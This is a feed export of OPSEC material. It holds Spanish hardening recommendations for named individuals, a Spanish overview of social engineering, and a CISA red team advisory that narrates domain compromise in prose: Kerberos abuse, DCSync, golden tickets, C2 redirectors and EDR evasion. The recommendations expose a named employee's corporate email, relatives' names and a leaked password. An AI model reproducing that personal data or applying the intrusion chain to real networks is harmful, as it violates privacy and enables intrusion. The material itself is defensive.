personal. Crear cuentas independientes para actividades personales (compras, foros, suscripciones). Revisar todas las cuentas online y desvincular correos corporativos de servicios ajenos a la actividad profesional (ej. Quora, PayPal, Trello). Cambiar todas las contraseñas filtradas inmediatamente, priorizando aquellas reutilizadas en múltiples plataformas. Implementar un gestor de contraseñas de confianza para generar y almacenar claves únicas, largas y robustas. Activar doble factor de autenticación (2FA) en todas las cuentas críticas: email, redes sociales, banca online, nube. Realizar una auditoría personal de datos expuestos usando servicios de vigilancia de identidad y bases OSINT como IntelligenceX o HaveIBeenPwned. Solicitar la eliminación o actualización de datos personales expuestos en foros públicos o filtraciones, cuando sea posible. Asegurarse de que todos los dispositivos (móvil, portátil, tablet) tengan cifrado de disco y estén actualizados. Usar una VPN confiable en redes Wi-Fi públicas para ocultar la IP real. Revisar permisos de aplicaciones conectadas a cuentas como Google o redes sociales y revocar accesos innecesarios. Desvincular la dirección residencial de estructuras patrimoniales públicas siempre que la legislación lo permita. Usar domicilios sociales diferentes cuando sea viable. Limitar referencias públicas a la sociedad patrimonial (SCI U LIMUNONU) en redes profesionales o documentos públicos. Sensibilizar a su entorno cercano (cónyuge incluido) sobre prácticas de privacidad y riesgo de correlación de identidades. Contratar o habilitar un servicio de monitoreo de identidad digital para recibir alertas en tiempo real de nuevas filtraciones. Programar revisiones periódicas de exposición digital cada 6 meses. Capacitarse en buenas prácticas de OPSEC y ciberhigiene: phishing, uso de dispositivos seguros, cifrado de comunicaciones. Evitar compartir información sensible por canales no cifrados o en redes sociales. ✅ Cambiar contraseñas y activar 2FA  ✅ Segregar cuentas personales y corporativas  ✅ Revisar exposiciones y eliminar accesos innecesarios  ✅ Proteger dispositivos y comunicaciones Separar completamente los correos corporativos y personales: nunca usar la cuenta de trabajo (teresa_schuller_sebastian@carrefour.com) para registros en servicios personales (Adobe, Amazon, Spotify, etc.). Crear cuentas personales nuevas, con correos distintos y robustos, para servicios de ocio o compras online. Cambiar inmediatamente todas las contraseñas vinculadas a los correos filtrados. Usar un gestor de contraseñas de confianza para generar claves únicas y seguras para cada servicio. Activar doble factor de autenticación (2FA) en servicios críticos como Apple ID, PayPal y cuentas de correo. Revisar qué servicios aún están vinculados a los correos filtrados y actualizarlos con nuevos emails personales. Comprobar filtraciones recientes en servicios de búsqueda de leaks como HaveIBeenPwned o Intelligence X. Dar de baja cuentas de servicios antiguos o no utilizados que puedan ser vector de ataque. Asegurarse de que todos los dispositivos (móvil, portátil, tablet) estén actualizados y con cifrado de disco. Utilizar VPN confiable en redes públicas y verificar que las conexiones web sean HTTPS. Revisar permisos de apps y extensiones vinculadas a correos y redes sociales. Concienciar a su hermana Belén Schüller y otros contactos cercanos sobre prácticas de seguridad digital y phishing dirigido. Evitar exponer fotos, direcciones o datos familiares en redes públicas sin configurar la privacidad correctamente. Activar alertas de seguridad para correos y cuentas clave: Google, Apple, bancos. Usar servicios de vigilancia de identidad para recibir notificaciones de nuevas filtraciones. No reutilizar contraseñas entre servicios diferentes. Evitar compartir datos sensibles por mensajería no cifrada. Revisar regularmente la configuración de privacidad en redes sociales y servicios en la nube. ✅ Cambiar contraseñas y activar 2FA  ✅ Segregar cuentas personales y profesionales  ✅ Revisar servicios vinculados y cerrar cuentas innecesarias  ✅ Proteger dispositivos y reforzar la privacidad del entorno familiar Mantener correos separados: usar un correo exclusivo para actividades laborales y otro diferente para registros personales y redes sociales. Revisar todas las plataformas donde se usa el alias justyna.torres y valorar la creación de alias alternativos para minimizar correlaciones. Cambiar inmediatamente la contraseña filtrada LeonBruno15 en Gmail y en cualquier otra cuenta donde se haya reutilizado. Usar un gestor de contraseñas para crear claves largas y únicas para cada servicio. Activar doble factor de autenticación (2FA) en todas las cuentas importantes (correo, redes sociales, banca online). Revisar configuraciones de seguridad y privacidad en los dispositivos asociados a los números +33 y +34. Valorar la posibilidad de registrar un número alternativo exclusivo para usos sensibles (banca, recuperación de cuentas) y mantener uno público para comunicaciones generales. No publicar el número personal en perfiles públicos o anuncios clasificados. Revisar y ajustar la privacidad en LinkedIn, X/Twitter, Instagram, Flickr y YouTube: limitar la visibilidad de publicaciones y contactos. Eliminar información sensible o demasiado detallada que pueda ser usada para spear-phishing o ingeniería social. Desactivar cuentas inactivas o que ya no se utilizan. Configurar alertas de seguridad en Gmail y redes sociales para detectar accesos sospechosos. Registrar el correo principal en servicios como HaveIBeenPwned para recibir notificaciones de nuevas filtraciones. Desconfiar de correos o mensajes que soliciten información confidencial o pagos urgentes, incluso si parecen legítimos. Validar siempre llamadas inesperadas que pidan códigos de verificación o contraseñas: colgar y contactar directamente con la entidad oficial. Informar a familiares y contactos de confianza para que no compartan información personal públicamente ni en conversaciones inseguras. Evitar mencionar detalles privados (viajes, ubicaciones) en publicaciones abiertas. ✅ Cambiar la contraseña filtrada y activar 2FA  ✅ Revisar redes sociales y ajustar privacidad  ✅ Monitorear filtraciones y reforzar dispositivos móviles  ✅ Sensibilizar entorno familiar Usa una contraseña diferente y robusta para cada servicio (correo, aplicaciones, intranet). Cambia periódicamente las contraseñas y evita reutilizarlas en sitios personales. Activa doble factor de autenticación (2FA) siempre que sea posible. Instala actualizaciones del sistema operativo y programas tan pronto como estén disponibles. Usa antivirus y antimalware actualizados. No descargues archivos o programas de fuentes desconocidas. No uses el correo corporativo para registrarte en redes sociales, tiendas online u otros servicios ajenos a la empresa. Evita almacenar datos personales (fotos, contraseñas, cuentas bancarias) en equipos corporativos. Desconfía de mensajes que pidan datos personales o urgentes (phishing). Verifica la dirección del remitente antes de responder o hacer clic en enlaces. Reporta a IT cualquier correo sospechoso. No compartas información interna o de clientes en redes sociales o conversaciones informales. Bloquea tu equipo cuando te ausentes del puesto de trabajo. Destruye físicamente documentos sensibles cuando ya no sean necesarios. No dejes dispositivos sin supervisión en lugares públicos. Evita conectarte a redes Wi-Fi públicas sin usar VPN corporativa. Revisa regularmente los permisos de las apps y elimina las innecesarias. Si sospechas de un incidente de seguridad (archivo extraño, contraseña robada), informa inmediatamente al departamento de TI. Cambia tus contraseñas y revisa tu actividad de cuenta. ✔ Contraseñas únicas y 2FA  ✔ Actualizaciones y antivirus al día  ✔ Separar vida laboral y personal  ✔ Precaución con correos y enlaces  ✔ Cuidar la información de la empresa  ✔ Supervisar tus dispositivos  ✔ Reportar incidentes rápido
tema-opsec-completo-analista ]]>projects/opsec/guia-opsec-carrefour.htmlProjects/opsec/guia-opsec-carrefour.mdTue, 28 Apr 2026 14:29:12 GMTtécnicas de ingeniería social), la inteligencia sobre credenciales comprometidas (infostealer monitoring), los mecanismos de detección y mitigación (detección de ataques comunes), y las prácticas de OPSEC que reducen la superficie de ataque humana.
El atacante recopila información usando OSINT: redes sociales, data brokers, LinkedIn, registros públicos. Las notas de scoring VIP muestran cómo cuantificar la exposición de ejecutivos. A mayor huella digital, mayor probabilidad de un ataque dirigido (spearphishing).
Las técnicas cubiertas en ceh-09-social-engineering abarcan: phishing (email), vishing (voz), smishing (SMS), pretexting, baiting, tailgating y quid pro quo. El plan-ejercicio-vishing documenta cómo simular estos ataques en un contexto de red team.
El caso real de Marks & Spencer / Scattered Spider demuestra la eficacia operativa: un grupo atacante usó ingeniería social para comprometer el helpdesk de IT, obtener credenciales privilegiadas y desplegar ransomware DragonForce. El vector no fue técnico — fue humano.
Una vez comprometidas las credenciales, entran en el circuito de infostealers: malware que roba cookies de sesión, tokens de autenticación y contraseñas almacenadas. Estos datos aparecen en mercados darknet y paste sites, cerrando el ciclo entre ingeniería social → compromiso → monetización.
El use case de phishing intelligence establece el proceso operativo para detectar campañas de phishing dirigidas a la organización: monitorización de dominios typosquatting, análisis de kits de phishing, y correlación con CTI feeds.
detection-mitigation-common-attacks cubre las técnicas de detección para phishing, spear-phishing y ataques de credenciales: reglas SIEM, correlación de eventos, y análisis de comportamiento anómalo (UEBA). Los playbooks de ciberseguridad proporcionan procedimientos de respuesta alineados con CISA.
El manual corporativo de OPSEC y la guía Carrefour establecen las contramedidas organizacionales: gestión de credenciales con gestor de contraseñas, 2FA/MFA obligatorio, cifrado de comunicaciones, eliminación de datos en brokers, y formación continua con simulacros trimestrales de phishing. La ingeniería social explota la brecha entre la superficie de exposición personal (OSINT recopilable) y los controles de OPSEC implementados. Cuanto mayor es la brecha, más fácil es el ataque. La defensa no es solo técnica (SIEM, EDR) — es operacional (OPSEC, formación, higiene de credenciales).
tema-opsec-completo-analista ]]>projects/opsec/ingenieria-social-compromiso-credenciales.htmlProjects/opsec/ingenieria-social-compromiso-credenciales.mdTue, 28 Apr 2026 14:29:12 GMTSecure by Design principles and implement the recommendations in the Mitigations section of this advisory, including those listed below: Embed security into product architecture throughout the entire software development lifecycle (SDLC). Eliminate default passwords. Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature. Download the PDF version of this report:
AA24-326A Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a U.S. Critical Infrastructure Sector Organization(PDF, 823.56 KB )CISA has authority to—upon request—provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non-federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6]). The target organization for this assessment was a critical infrastructure organization in the United States. After receiving a request for an RTA from the organization and coordinating the high-level details of the engagement, CISA conducted the RTA over approximately a three-month period.During RTAs, a CISA red team simulates real-world threat actors to assess an organization’s cybersecurity detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network, avoid detection, evade defenses, and access SBSs. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, and/or technology.Drafted in coordination with the assessed organization, this advisory details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders with recommendations for improving an organization’s cybersecurity posture. The advisory also provides recommendations for software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise.
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See Appendix: MITRE ATT&CK Tactics and Techniques for a table of the red team’s activity mapped to MITRE ATT&CK tactics and techniques.
The CISA red team operated without prior knowledge of the organization’s technology assets and began the assessment by conducting open source research on the target organization to gain information about its network [T1590], defensive tools [T1590.006], and employees [T1589.003]. The red team designed spearphishing campaigns [T1566] tailored to employees most likely to communicate with external parties. The phishing attempts were ultimately unsuccessful—targets ran the payloads [T1204], but their execution did not result in the red team gaining access into the network.
After the failed spearphishing campaigns, the red team continued external reconnaissance of the network [T1595] and discovered a web shell [T1505.003] left from a previous Vulnerability Disclosure Program (VDP). The red team used this for initial access [TA0001] and immediately reported it to the organization’s trusted agents (TAs). The red team leveraged that access to escalate privileges [TA0004] on the host, discover credential material on a misconfigured Network File System (NFS) share [T1552.001], and move from a DMZ to the internal network [TA0008].
With access to the internal network, the red team gained further access to several SBSs. The red team leveraged a certificate for client authentication [T1649] they discovered on the NFS share to compromise a system configured for Unconstrained Delegation. This allowed the red team to acquire a ticket granting ticket (TGT) for a domain controller [T1558.001], used to further compromise the domain. The red team leveraged this level of access to exploit SBS targets provided by the organization’s TAs.The assessed organization detected much of the red team’s activity in their Linux infrastructure after CISA alerted them via other channels to the vulnerability the red team used for initial access. Once given an official notification of a vulnerability, the organization’s network defenders began mitigating the vulnerability. Network defenders removed the site hosting the web shell from the public internet but did not take the server itself offline. A week later, network defenders officially declared an incident once they determined the web shell was used to breach the internal network. For several weeks, network defenders terminated much of the red team’s access until the team maintained implants on only four hosts. Network defenders successfully delayed the red team from accessing many SBSs that required additional positioning, forcing the red team to spend time refortifying their access in the network. Despite these actions, the red team was still able to access a subset of SBSs. Eventually, the red team and TAs decided that the network defenders would stand down to allow the red team to continue its operations in a monitoring mode. In monitoring mode, network defenders would report what they observed of the red team’s access, but not continue to block and terminate it.See Figure 1 for a timeline of the red team’s activity with key points access. See the following sections for additional details, including the red team’s TTPs.
Figure 1: Timeline of Red Team Cyber Threat Activity
Following an unsuccessful spearphishing campaign, the red team gained initial access to the target by exploiting an internet-facing Linux web server [T1190] discovered through reconnaissance [TA0043] of the organization’s external internet protocol (IP) space [T1590.005].
The red team first conducted open source research [T1593] to identify information about the organization’s network, including the tools used to protect the network and potential targets for spearphishing. The red team looked for email addresses [T1589.002] and names to infer email addresses from the organization’s email syntax (discovered during reconnaissance). Following this action, the red team sent tailored spearphishing emails to 13 targets [T1566.002]. Of these 13 targets, one user responded and executed two malicious payloads [T1204.002]. However, the payloads failed to bypass a previously undiscovered technical control employed by the victim organization, preventing the red team’s first attempt to gain initial access.
To find an alternate pathway for initial access, the red team conducted reconnaissance with several publicly available tools, such as Shodan and Censys, to discover accessible devices and services on the internet [T1596.005]. The red team identified an old and unpatched service with a known XML External Entity (XXE) vulnerability and leveraged a public proof of concept to deploy a web shell. The associated product had an exposed endpoint—one that system administrators should typically block from the public internet—that allowed the red team to discover a preexisting web shell on the organization’s Linux web server. The preexisting web shell allowed the red team to run arbitrary commands on the server [T1059] as a user (WEBUSER1). Using the web shell, the red team identified an open internal proxy server [T1016] to send outbound communications to the internet via Hypertext Transfer Protocol Secure (HTTPS). The red team then downloaded [T1105] and executed a Sliver payload that utilized this proxy to establish command and control (C2) over this host, calling back to their infrastructure [TA0011].Note: Because the web shell and unpatched vulnerability allowed actors to easily gain initial access to the organization, the CISA red team determined this was a critical vulnerability. CISA reported both the vulnerability and the web shell to the organization in an official vulnerability notification so the organization could remediate both issues. Following this notification, the victim organization initiated threat hunting activities, detecting some of the red team’s activity. The TAs determined that network defenders had previously identified and reported the vulnerability but did not remediate it. Further, the TAs found that network defenders were unaware of the web shell and believed it was likely leftover from prior VDP activity. See the Defense Evasion and Victim Network Defense Activities section for more information.
The red team then moved laterally from the web server to the organization’s internal network using valid accounts [T1078] as the DMZ was not properly segmented from the organization’s internal domain.
The red team acquired credentials [TA0006] by first escalating privileges on the web server. The team discovered that WEBUSER1 had excessive sudo rights, allowing them to run some commands as root commands without a password. They used these elevated rights to deploy a new callback with root access [T1548.003].
With root access to the web server, the team had full access to the organization’s directories and files on a NFS share with no_root_squash enabled. If no_root_squash is used, remote root users can read and change any file on the shared file system and leave a trojan horse [T1080] for other users to inadvertently execute. On Linux operating systems this option is disabled by default, yet the organization enabled it to accommodate several legacy systems. The organization’s decision to enable the no_root_squash option allowed the red team to read all the files on the NFS share once it escalated its privileges on a single host with the NFS share mounted. This NFS share hosted the home directories of hundreds of Linux users—many of which had privileged access to one or more servers—and was auto-mounted when those users logged into Linux hosts in the environment.
The red team used its escalated privileges to search for private certificate files, Secure Shell (SSH) private keys, passwords, bash command histories [T1552.003], and other sensitive data across all user files on the NFS share [T1039]. The team initially obtained 61 private SSH keys [T1552.004] and a file containing valid cleartext domain credentials (DOMAINUSER1) that the team used to authenticate to the organization’s domain [T1078.002].
In the organization’s Linux environment, the red team leveraged HTTPS connections for C2 [T1071.001]. Most of the Linux systems could not directly access the internet, but the red team circumvented this by leveraging an open internal HTTPS proxy [T1090.001] for their traffic.
The red team’s acquisition of SSH private keys generated for user and service accounts facilitated unrestricted lateral movement to other Linux hosts [T1021.004]. This acquisition included two highly privileged accounts with root access to hundreds of servers. Within one week of initial access, the team moved to multiple Linux servers and established persistence [TA0003] on four. The team used a different persistence mechanism on each Linux host, so network defenders would be less likely to discover the red team’s presence on all four hosts. The team temporarily backdoored several scripts run at boot time to maintain persistence [T1037], ensuring the original versions of the scripts were re-enabled once the team successfully achieved persistence. Some of the team’s techniques included modifying preexisting scripts run by the cron utility [T1053.003] and ifup-post scripts [T1037.003].
Of note, the team gained root access to an SBS-adjacent infrastructure management server that ran Ansible Tower. Access to this Ansible Tower system [T1072] provided easy access to multiple SBSs. The team discovered a root SSH private key on the host, which allowed the team to move to six SBSs across six different sensitive IP ranges. A week after the team provided screenshots of root access to the SBSs to the TAs, the TAs deconflicted the red team’s access to the Ansible Tower system that network defenders discovered. The organization detected the compromise by observing abnormal usage of the root SSH private key. The root SSH private key was used to log into multiple hosts at times and for durations outside of preestablished baselines. In a real compromise, the organization would have had to shut down the server, significantly impacting business operations.Approximately two weeks after gaining initial access, the red team compromised a Windows domain controller. This compromise allowed the team to move laterally to all domain-joined Windows hosts within the organization.
To first gain situational awareness about the organization’s environment, the red team exfiltrated Active Directory (AD) information [TA0010] from a compromised Linux host that had network access to a Domain Controller (DC). The team queried Lightweight Directory Access Protocol (Over SSL)—(LDAPS)—to collect information about users [T1087.002], computers [T1018], groups [T1069.002], access control lists (ACL), organizational units (OU), and group policy objects (GPO) [T1615]. Unfortunately, the organization did not have detections to monitor for anomalous LDAP traffic. A non-privileged user querying LDAP from the organization’s Linux domain should have alerted network defenders.The red team observed a total of 42 hosts in AD that were not DCs, but had Unconstrained Delegation enabled. Hosts with Unconstrained Delegation enabled store the Kerberos TGTs of any user that authenticates to them. With sufficient privileges, an actor can obtain those tickets and impersonate associated users. A compromise of any of these hosts could lead to the escalation of privileges within the domain. Network defenders should work with system administrators to determine whether Unconstrained Delegation is necessary for their systems and limit the number of systems with Unconstrained Delegation unnecessarily enabled.The red team observed insufficient network segmentation between the organization’s Linux and Windows domains. This allowed for Server Message Block (SMB) and Kerberos traffic to a DC and a domain server with Unconstrained Delegation enabled (UDHOST). The team discovered an unprotected Personal Information Exchange (.pfx) file on the NFS home share that they believed was for UDHOST based on its naming convention.Equipped with the .pfx file, the red team used Rubeus—an open source toolset for Kerberos interaction and abuses—to acquire a TGT and New Technology Local Area Network Manager (NTLM) hash for UDHOST from the DC. The team then used the TGT to abuse the Server-for-User-to-Self (S4U2Self) Kerberos extension to gain administrative access to UDHOST.
The red team leveraged this administrative access to upload a modified version of Rubeus in monitor mode to capture incoming tickets [T1040] on UDHOST with Rubeus’ /monitor command. Next, the team ran DFSCoerce.py to force the domain controller to authenticate to UDHOST [T1187]. The team then downloaded the captured tickets from UDHOST.
With the DC’s TGT, the team used Domain Controller Sync (DCSync) through their Linux tunnels to acquire the hash of several privileged accounts—including domain, enterprise, and server administrators—and the critical krbtgt account [T1003.006]. Once the team harvested the credentials needed, they moved laterally to nearly any system in the Windows domain (see Figure 2) through the following steps (hereafter, this combination of techniques is referred to as the “Preferred Lateral Movement Technique”): The team either forged a golden ticket using the krbtgt hash or requested a valid TGT using the hashes they exfiltrated for a specific account before loading the ticket into their session for additional authentication. The team dropped an inflated Dynamic Link Library (DLL) file associated with legitimate scheduled tasks on the organization’s domain. When the scheduled task executed on its own or through the red team’s prompting, the DLL hijack launched a C2 implant.
Figure 2: Movement to Domain Controller
The red team initially established C2 on a workstation over HTTPS before connecting to servers over SMB [T1071.002] in the organization’s Windows environment. To connect to certain SBSs later in its activity, the team again relied on HTTPS for C2.After the red team gained persistent access to Linux and Windows systems across the organization’s networks, the team began post-exploitation activities and attempted to access SBSs. The TAs provided a scope of the organization’s Classless Inter-Domain Routing (CIDR) ranges that contained SBSs. The team gained root access to multiple Linux servers in these ranges. The TAs then instructed the red team to exploit its list of primary targets: admin workstations and network ranges that included OT networks. The team only achieved access to the first two targets and did not find a path to the OT networks. While the team was able to affect the integrity of data derived from OT devices and applications, it was unable to find and access the organization’s internal network where the OT devices resided.
To gain access to the SBSs, the team first gained access to Microsoft System Center Configuration Manager (SCCM) servers, which managed most of the domain’s Windows systems. To access the SCCM servers, the team leveraged their AD data to identify administrators [T1087] of these targets. One of the users they previously acquired credentials for via DCSync was an administrator on the SCCM servers. The red team then used the Preferred Lateral Movement Technique to eventually authenticate to the SCCM servers. See Figure 3.
Figure 3: Attack Path to SCCM ServerThe first specific set of SBS targets provided by the TAs were admin workstations. These systems are used across various sensitive networks external to, or inaccessible from, the internal network where the team already had access. Normally, authorized personnel leverage these administrator workstations to perform administrator functions. CISA’s red team targeted these systems in the hopes that an authorized—but unwitting—user would move the tainted system to another network, resulting in a callback from the sensitive target network.The red team reviewed AD data to identify these administrator systems. Through their review, the team discovered a subset of Windows workstations that could be identified with a prefix and determined a group likely to have administrative rights to the workstations.With access to the SCCM server, the red team utilized their Preferred Lateral Movement Technique to gain access to each admin workstation target (see Figure 4).
Figure 4: Attack Path from SCCM Server to Admin WorkstationsThe red team maintained access to these systems for several weeks, periodically checking where they were communicating from to determine if they had moved to another network. Eventually, the team lost access to these systems without a deconfliction. To the best of the red team’s knowledge, these systems either did not move to new networks or, if they did, those systems no longer had the ability to communicate with red team’s C2 infrastructure.
Figure 5: Attack Path from SCCM Server to Host and Other SubnetsAfter compromising admin workstations, the red team requested that the TAs prioritize additional systems or IP ranges. The TAs provided four CIDR ranges to target: A corporate DMZ that contained a mixture of systems and other subnets. A second subnet. A third subnet.  An internal network that contained OT devices. Access to the corporate DMZ was necessary to reach the second and third ranges, and the red team hoped that gaining access to these would facilitate access to the fourth range.
The red team followed a familiar playbook to gain access to these SBSs from another SCCM server. First, the team performed reverse DNS lookups [T1596.001] on IP addresses within the ranges the TAs provided. They then scanned SMB port 445/TCP [T1046] from a previously compromised SCCM server to discover Windows hosts it could access on the corporate DMZ. The team discovered the server could connect to a host within the target IP range and that the system was running an outdated version of Windows Server 2012 R2. The default configuration of Windows Server 2012 R2 allows unprivileged users to query the group membership of local administrator groups. The red team discovered a user account [T1069] by querying the Windows Server 2012 R2 target that was in a database administrator group. The team leveraged its Preferred Lateral Movement Technique to authenticate to the target as that user, then repeated that technique to access a database. This database receives information from OT devices used to feed monitoring dashboards, information which factors into the organization’s decision-making process [T1213].
The new host had several active connections to systems in the internal ranges of the second and third subnets. Reverse domain name system (DNS) lookup requests for these hosts failed to return any results. However, the systems were also running Windows Server 2012 R2. The red team used Windows API calls to NetLocalGroupEnum and NetLocalGroupGetMembers to query local groups [T1069.001], revealing the system names for these targets as a result. The red team performed their Preferred Lateral Movement Technique to gain access to these hosts in the second and third provided network ranges.With access to these subnets, the red team began exploring a path to systems on a private subnet where OT devices resided but failed to locate a path to that fourth subnet.Next, the red team targeted the corporate workstations of the administrators and operators of the organization’s critical infrastructure. Because the team lacked knowledge of the organization’s OT devices and failed to discover a path to the private subnet where they resided, they instead tried to locate users that interacted with human machine interfaces (HMI). Access to such users could enable the team to access the HMI, which serves as a dashboard for OT.The red team leveraged its AD data once again, combining this data with user information from SCCM to identify targets by job role and their primary workstation. Then the team targeted the desktop of a critical infrastructure administrator, the workstation of another critical infrastructure administrator, and the workstations of three critical infrastructure operators spread across two geographically disparate sites.The AD data revealed users in a group that were administrators of all the targets. The red team then repeated their Preferred Lateral Movement Technique and identified a logged-in user connected to a “System Status and Alarm Monitoring” interface. The team discovered credentials to the interface in the user’s home directory, proxied through the system, and accessed the HMI interface over HTTP. The team did not pursue further activity involving the interface because their remaining assessment time was limited. Additionally, they did not discover a way to compromise the underlying OT devices.
The team used third-party owned and operated infrastructure and services [T1583] throughout its assessment, including in certain cases for command and control (C2). The tools that the red team obtained included [T1588.002]: Sliver, Mythic, Cobalt Strike, and other commercial C2 frameworks. The team maintained multiple command and control servers hosted by several cloud vendors. They configured each server with a different domain and used the servers for communication with compromised hosts. These servers retained all assessment data. Two commercially available cloud-computing platforms.
The team used these platforms to create flexible and dynamic redirect servers to send traffic to the team’s servers [T1090.002]. Redirecting servers make it difficult for defenders to attribute assessment activities to the backend team servers. The redirectors use HTTPS reverse proxies to redirect C2 traffic between the target organization’s network and the team servers. The team encrypted all data in transit [T1573] and secured all data at rest through a VPN with multifactor authentication. Content delivery network (CDN) services. This technique leverages CDNs associated with high-reputation domains, causing malicious traffic to appear directed towards a reputational domain. However, it is redirected to red team-controlled servers. This allows the team to obfuscate some of their C2 traffic.
The team used domain fronting [T1090.004] to disguise outbound traffic, diversifying communications between the domains and the persistent beacons. This technique (which also leverages CDNs) allows the beacon to appear to connect to third-party domains but instead connects to the team’s redirect server.
Most of the encounters between the red team and network defenders occurred in the organization’s Linux environment. The red team leveraged Linux tradecraft in an attempt to evade network defenses. In response, network defenders’ threat hunting activities identified some of the team’s presence in their Linux environment. To evade defenses, the red team reordered the process identifier (PID) of its executable processes to appear closer to the kernel and minimize the team’s likelihood of detection. The team also modified its processes [T1055] by changing their names in memory and at execution. In addition, they used Python scripts [T1059.006] run in memory [T1620] to avoid on-disk detection. Some of the red team’s Linux persistence techniques included modifying preexisting scripts run by the cron utility and creating backdoors through ifup-post scripts and .bashrc. Network defenders ultimately identified the team’s backdoor in .bashrc [T1546.004].Defenders also successfully detected anomalous activity on their Ansible Tower host and other systems in their Linux environment. The defenders actively analyzed NetFlow data, which helped them identify the red team’s persistence and lateral movement. To mitigate the impact of the red team’s tactics, network defenders would have needed to shut down a critical server as part of their incident response activities. A shut down would have resulted in downtime for hundreds of systems, including SBSs.
The organization’s EDR solutions largely failed to protect the organization. EDR detected only a few of the red team’s payloads in the organization’s Windows and Linux environments. In the instance the EDR protected the organization from the initial phishing payload, it generated an alert that network defenders neither read nor responded to. The red team excelled in bypassing EDR solutions by avoiding the use of basic “known-bad” detections the tools would capture. The team also inflated its file sizes above the upload threshold of the organization’s EDR [T1027.001]. In addition, the organization completely lacked any EDR solution in a legacy environment. As such, the red team’s persistence there went undetected throughout the assessment.Network defenders failed to detect red team activity in the organization’s Windows environment due to a lack of proper identity management. Specifically, network defenders failed to detect and respond to the red team’s S4U2Self, asktgs, dcsync, and golden ticket activity. Had the organization monitored for unusual activity involving AD and Kerberos, they would have detected more red team activity.Lastly, there were significant deficiencies in the organization’s DMZ that should have detected traffic into the organization’s internal network over the ports used by SMB and LDAPS. Network defenders never properly implemented an intrusion detection system (IDS) or intrusion prevention system (IPS) to monitor the DMZ at the network level. This lack of implementation resulted in a failure to detect malicious network traffic through their DMZ. Further, the red team was able to move laterally through the DMZ because there was an open internal proxy with internet access that enabled the team’s C2.The red team executed 13 measurable events designed to provoke a response from the people, processes, and technology defending the organization’s network. The red team did not have full visibility into the organization’s responses to these events and lacked the support of a white team to help assess the organization’s responses. See Table 1 for a description of the events, the organization’s actual response, and key takeaways.Table 1: Measurable events |Measurable Event|Description|MITRE ATT&CK Technique(s)|Organization’s Reported Reactions|Key Takeaways| |---|---|---|---|---|
|Internal Port Scan|Launches a scan from inside the network from a previously gained workstation to enumerate ports on target workstation, server, and domain controller system(s).|Network Service Discovery [T1046]|Identified an AD enumeration tool and temporarily blocked access to one C2 domain, which resulted in the red team temporarily losing access to six SCCM servers.|The organization did not report identifying the port scan. In addition, with proper network segmentation, the scan’s target hosts should not have been able to communicate.|
|Comprehensive Active Directory and Host Enumeration|Performs AD enumeration by querying all domain objects from the DC and enumerates trust relationships within the AD Forest, user accounts, and current session information from every domain computer (workstation and server).|Domain Trust Discovery [T1482]
Account Discovery: Domain Account [T1087.002]
System Owner/User Discovery [T1033]
Remote System Discovery [T1018]|Identified an AD enumeration tool and temporarily blocked access to one C2 domain, which resulted in the red team temporarily losing access to six SCCM servers.|The organization did not report identifying the port scan. In addition, with proper network segmentation, the scan’s target hosts should not have been able to communicate.|
|Data Exfiltration – 1 GB of Data|Sends a large amount (1GB) of mock sensitive information to an external host.|Exfiltration Over Alternative Protocol [T1048]|A proxy likely blocked 1GB of data exfiltration during the red team’s first attempt. However, the team’s second attempt was successful when they exfiltrated the data in 100MB blocks. Hours after the data exfiltration, the organization blocked the domain used for C2 and removed access to the compromised host.|Organizations should implement web proxies that contain data threshold restrictions. Furthermore, network defenders need to manually analyze proxy data to determine whether there is legitimate outbound traffic or potentially malicious data exfiltration.|
|Malicious Traffic Generation- Workstation to External Host|Establishes a session that originates from a target workstation system directly to an external host over a clear text protocol, such as HTTP.|Application Layer Protocol [T1071]|The organization blocked access to the host and the C2 domains the red team used.|The organization blocked the malicious traffic at the network level but did not appear to identify the source workstation.|
|Active Directory Account Lockout|Locks out several administrative AD accounts in rapid succession.|Account Access Removal [T1531]|The organization’s password policy locked out the AD accounts. However, within minutes the accounts reopened, likely due to a group policy and/or an automated response.|There was no identified active response from the organization. Organizations should monitor AD account activity in Windows event logs against baselines to detect anomalous and potentially malicious activity.|
|Local Admin User Account Creation (workstation)|Creates a local administrator account on a target workstation system.|Create Account: Local Account [T1136.001]
Account Manipulation [T1098]|An automated response removed the account from local administrator’s group but did not delete it.|Despite group policy objects removing the account, there were no detections for the activity.|
|Local Admin User Account Creation (server)|Creates a local administrator account on a target server system.|Create Account: Local Account [T1136.001]
Account Manipulation [T1098]|An automated response removed the account from local Administrator’s group but did not delete it.|Despite group policy objects removing the account, there were no detections for the activity.|
|Active Directory Account Creation|Creates AD accounts and add them to domain admins group|Create Account: Domain Account [T1136.002]
Account Manipulation [T1098]|An alert existed for this action but was disabled at the time the original event was triggered, thus it was undetected. After coordination between the TAs and red team revealed this lapse, the alert was enabled, the red team performed the action once again, and this time, TAs provided a screenshot of the alert from their monitoring dashboards.|Detection tools are only useful when network defenders tune them appropriately and effectively monitor alerts. At first, the organization missed an opportunity to respond to a tool that should have produced a true positive alert because it was misconfigured.|
|Domain Admin Lateral Movement—Workstation to Domain Controller and Workstation to Workstation|Compromises a Domain Admin account and uses it to run PSExec on multiple workstations and domain controllers.|System Services: Service Execution [T1569.002]
Remote Services: SMB/Windows Admin Shares [T1021.002]|None identified.|Detect malicious use of standard tools like PSExec that malicious cyber actors may use for lateral movement by monitoring Windows logs for anomalous activity. In addition, organizations should look for abnormal communications between workstations.|
|Malicious Traffic Generation- Domain Controller to External Host|Establishes a session that originates from a target domain controller system directly to an external host over a clear text protocol, such as HTTP.|Application Layer Protocol [T1071]|None identified.|DCs should never connect directly to an external host over HTTP. The organization failed to detect and respond to this.|
